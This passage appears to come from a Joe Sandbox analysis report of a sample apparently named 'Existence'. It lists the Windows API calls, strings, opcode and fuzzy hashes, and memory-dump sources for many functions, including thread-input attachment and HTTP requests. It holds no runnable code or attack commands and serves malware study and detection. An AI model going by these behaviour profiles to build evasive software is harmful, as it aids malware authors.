• Instruction ID: eb8d62e4193e6c1684b64e6d9a853a123271ba60f378af6ebfea103cd5150854
• Opcode Fuzzy Hash: 2c3a7d24c227044a0243527a65f83f49166294592dd3425d6031686b0b1d1e7a
• Instruction Fuzzy Hash: 7EC125B1608305AFD700DF68C884A6BB7E9FF89748F10492DF9899B212DB35ED45CB52
Uniqueness
Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000), ref: 007A8538
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007A85D4
• SHGetDesktopFolder.SHELL32(?), ref: 007A85E8
• CoCreateInstance.OLE32(007D0CD4,00000000,00000001,007F7E8C,?), ref: 007A8634
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007A86B9
• CoTaskMemFree.OLE32(?,?), ref: 007A8711
• SHBrowseForFolderW.SHELL32(?), ref: 007A879C
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007A87BF
• CoTaskMemFree.OLE32(00000000), ref: 007A87C6
• CoTaskMemFree.OLE32(00000000), ref: 007A881B
• CoUninitialize.OLE32 ref: 007A8821
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 6ca64e70110e5db0037f5ac85162d4bb831e105ae64174b5439c4c6f1c3b4cf7
• Instruction ID: 7114081be4cfdbcd930599938d59e8bba57899e0a80264bd9c4d347ebfa6de6f
• Opcode Fuzzy Hash: 6ca64e70110e5db0037f5ac85162d4bb831e105ae64174b5439c4c6f1c3b4cf7
• Instruction Fuzzy Hash: 3FC13C75A00105EFDB54DFA4C888DAEBBF5FF49304B1481A8F9199B262DB34EE41CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0079039F
• SafeArrayAllocData.OLEAUT32(?), ref: 007903F8
• VariantInit.OLEAUT32(?), ref: 0079040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0079042A
• VariantCopy.OLEAUT32(?,?), ref: 0079047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00790491
• VariantClear.OLEAUT32(?), ref: 007904A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 007904B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007904BC
• VariantClear.OLEAUT32(?), ref: 007904CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007904D9
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: f2899c650ef7d9fb94b987fb92a785593de13167945847ddf6c1ec6c6d6f0c81
• Instruction ID: b886f67dc34df400f54bac3cdc14379443ad0bda0483c7dc351f9da0691bbee9
• Opcode Fuzzy Hash: f2899c650ef7d9fb94b987fb92a785593de13167945847ddf6c1ec6c6d6f0c81
• Instruction Fuzzy Hash: C8416075A00259DFCF14DFA4D848DAEBBB9FF48354F008069EA45A7261DB38AE45CF90
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: ea2ffba0c83791d8386823410774eeab5c8e55d3bf6377801b41e037d6a6716c
• Instruction ID: 911180a55f0e9606bce51bb3dcd5e2343fb89bce23ac3b8184e8cce98c301e05
• Opcode Fuzzy Hash: ea2ffba0c83791d8386823410774eeab5c8e55d3bf6377801b41e037d6a6716c
• Instruction Fuzzy Hash: 6051C331A00116DBCF14DF68C951AFEB3A5BF65364B204229EB76E7285DB39DD40C790
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoInitialize.OLE32 ref: 007B41D1
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007B41DC
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,007D0B44,?), ref: 007B4236
                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 007B42A9
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B4341
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B4393
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                          • API String ID: 636576611-1287834457
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetLocalTime.KERNEL32(?), ref: 007A8C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 007A8CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007A8CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007A8D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007A8DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8DDA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
Uniqueness
• Uniqueness Score: -1.00%
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007A3E14
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007A3E35
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetErrorMode.KERNEL32(00000001), ref: 007A5DE5
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007A5E5B
• GetLastError.KERNEL32 ref: 007A5E65
• SetErrorMode.KERNEL32(00000000,READY), ref: 007A5EEC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
Uniqueness
• Uniqueness Score: -1.00%
APIs
• CreateMenu.USER32 ref: 007C4715
• SetMenu.USER32(?,00000000), ref: 007C4724
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C47AC
• IsMenu.USER32(?), ref: 007C47C0
• CreatePopupMenu.USER32 ref: 007C47CA
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C47F7
• DrawMenuBar.USER32 ref: 007C47FF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007928B1
• GetDlgCtrlID.USER32 ref: 007928BC
• GetParent.USER32 ref: 007928D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007928DB
• GetDlgCtrlID.USER32(?), ref: 007928E4
• GetParent.USER32(?), ref: 007928F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007928FB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
                                                                                                                                                                                          • Opcode ID: 715edcbc6a7277bfb4e5ad56d958085c73e3270f6f0b67bd7c29bacfe363141b
                                                                                                                                                                                          • Instruction ID: f805268724bfb877c8178edb2d29c4f235ddbe06a83a8b34b7c7420d12644feb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 715edcbc6a7277bfb4e5ad56d958085c73e3270f6f0b67bd7c29bacfe363141b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B521D4B4900118FBCF10AFA0DC89EEEBBB4EF05350F10416AB951A7292DB3D5819DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00792990
• GetDlgCtrlID.USER32 ref: 0079299B
• GetParent.USER32 ref: 007929B7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007929BA
• GetDlgCtrlID.USER32(?), ref: 007929C3
• GetParent.USER32(?), ref: 007929D7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007929DA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 8fa83370bbe6b1ba7192ca4ce919dad087d24e423823e0a48876a7e4e0a758a6
• Instruction ID: e23ac08e17996f9a7be39a42cb50062da295bbf11ffef128589e482c5a3c26b8
• Opcode Fuzzy Hash: 8fa83370bbe6b1ba7192ca4ce919dad087d24e423823e0a48876a7e4e0a758a6
• Instruction Fuzzy Hash: AB21A1B5A00118FBDF11ABA0DC89EFEBBB8EF05350F104056BA51A7292CB7D5819DB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C4539
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C453C
• GetWindowLongW.USER32(?,000000F0), ref: 007C4563
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C4586
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C45FE
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 007C4648
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 007C4663
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 007C467E
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 007C4692
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 007C46AF
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 98887cad9248683b215a485db471f95e2f5817de59e79dafb3446dcb90148bb1
• Instruction ID: 30c8c24d6037a581112743693e344a3de8d83aa122492ff6ac6dd730382fb9d3
• Opcode Fuzzy Hash: 98887cad9248683b215a485db471f95e2f5817de59e79dafb3446dcb90148bb1
• Instruction Fuzzy Hash: DF616A75A00218AFDB21DFA8CC85FEE77B8EB09710F10415AFA14E72A1D7B8AD45DB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0079BB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 0079BB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0079BB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0079ABA8,?,00000001), ref: 0079BBE4
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 47c0271059ea31caf09b72cc749d8746dee79923ed6c2c30b0d19f60db2d5717
• Instruction ID: 7bbfbaaa641e95889c41b368f46e1302bac07fe3f9c8c334d0387c94b71fa515
• Opcode Fuzzy Hash: 47c0271059ea31caf09b72cc749d8746dee79923ed6c2c30b0d19f60db2d5717
• Instruction Fuzzy Hash: 9B318CF2904604AFDF609BA4FE88F6977B9BB44356F118019FB05A62E4D7B89C40CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007A89F2
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8A06
• GetFileAttributesW.KERNEL32(?), ref: 007A8A30
• SetFileAttributesW.KERNEL32(?,00000000), ref: 007A8A4A
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8A5C
• SetCurrentDirectoryW.KERNEL32(?), ref: 007A8AA5
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007A8AF5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: f3b2e3d110738574cbfaf943db561fdb5a3db59aa614497ec757f7b58baa7e58
• Instruction ID: 58ff92e9883bb342c84227d837ff66b1a2a3f019131770e55180195543cc3f8e
• Opcode Fuzzy Hash: f3b2e3d110738574cbfaf943db561fdb5a3db59aa614497ec757f7b58baa7e58
• Instruction Fuzzy Hash: C4817E72904245DBDB64EF14C444AABB3E8BBC6310F548A1EF885D7251EF3CE9458B53
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 007374D7
                                                                                                                                                                                            • Part of subcall function 00737567: GetClientRect.USER32(?,?), ref: 0073758D
                                                                                                                                                                                            • Part of subcall function 00737567: GetWindowRect.USER32(?,?), ref: 007375CE
                                                                                                                                                                                            • Part of subcall function 00737567: ScreenToClient.USER32(?,?), ref: 007375F6
                                                                                                                                                                                          • GetDC.USER32 ref: 00776083
                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00776096
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007760A4
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007760B9
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 007760C1
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00776152
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                                          • Opcode ID: eedeb1b263227a1c2be193b1ea0435e288109614b7982589206a691b7ccad19c
                                                                                                                                                                                          • Instruction ID: c97625464da9319abd42053888aedc4fd5d04b0492d8930fb696e98273a8913b
                                                                                                                                                                                          • Opcode Fuzzy Hash: eedeb1b263227a1c2be193b1ea0435e288109614b7982589206a691b7ccad19c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8871DF71500609EFDF358F64CC88EAA3BB1FF493A0F248269ED595A1ABC7399C40DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                            • Part of subcall function 007319CD: GetCursorPos.USER32(?), ref: 007319E1
                                                                                                                                                                                            • Part of subcall function 007319CD: ScreenToClient.USER32(00000000,?), ref: 007319FE
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000001), ref: 00731A23
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000002), ref: 00731A3D
                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 007C95C7
                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 007C95CD
                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 007C95D3
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 007C966E
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007C9681
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 007C975B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                                          • Opcode ID: 7451fc99e66fb3c25f5f50e8a9dd23d822fbbc248b9591c376287ef4c4672faa
                                                                                                                                                                                          • Instruction ID: 16b5a67f79238f91aa4c07b53b42844f27af18ad071bcb8cf0516812019459fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7451fc99e66fb3c25f5f50e8a9dd23d822fbbc248b9591c376287ef4c4672faa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71517C71104304AFE754EF24CC5AFAA77E4FB84714F400A2CFA95962E2DB79AD48CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007ACCB7
                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007ACCDF
                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007ACD0F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007ACD67
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 007ACD7B
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007ACD86
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
